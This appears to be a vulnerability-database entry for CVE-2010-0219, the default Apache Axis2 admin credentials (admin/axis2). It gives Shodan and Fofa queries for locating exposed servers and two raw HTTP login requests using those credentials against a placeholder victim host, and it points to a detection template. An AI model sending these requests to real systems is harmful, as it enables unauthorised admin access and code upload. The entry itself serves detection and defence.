🔙 목록으로 돌아가기

CVE-2010-0219: Apache Axis2 Default Login

TitleApache Axis2 Default Login
Authorpikpikcu
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.
RemediationDisable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.
CVSS Score10
EPSS Score0.93421
CVE IDCVE-2010-0219
CWE IDCWE-255
Shodan Queryhttp.html:"Apache Axis"http.html:"apache axis"
Fofa Querybody="apache axis"
Tags cve cve2010 axis apache default-login axis2 vkev vuln

🔍 Vulnerability Description

Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.

🌐 HTTP Request

POST /axis2/axis2-admin/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

userName=admin&password=axis2&submit=+Login+
POST /axis2-admin/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

loginUsername=admin&loginPassword=axis2

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-0219.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-0219.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A